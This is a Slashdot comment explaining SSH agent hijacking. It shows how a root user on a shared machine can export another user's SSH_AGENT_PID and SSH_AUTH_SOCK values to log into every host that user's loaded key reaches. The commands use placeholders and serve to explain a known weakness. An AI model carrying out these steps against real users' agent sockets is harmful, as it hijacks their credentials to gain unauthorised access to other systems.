Forgot your password?
typodupeerror

Comment: Re:Huh? What? (Score 5, Informative) 194

by Riku (#15414864) Attached to: Overconfidence in SSH Protection
Here's a summary for you:

User A on box foo:
foo> ssh-agent xterm
foo> ssh-add
  * enters their pass key *
User A can now ssh to any box that has their public key in box:$HOME/.ssh/authorized_keys

User B (evul hacker with root on box foo):
foo# SSH_AGENT_PID=XXXX; export SSH_AGENT_PID
foo# SSH_AUTH_SOCK=/tmp/ssh-YYYY/ZZZZ; export SSH_AUTH_SOCK
User B now can ssh to any box that User A can, as above.
(where XXXX, YYYY, and ZZZZ are determined by evul hacker)

Porsche: there simply is no substitute. -- Risky Business

Working...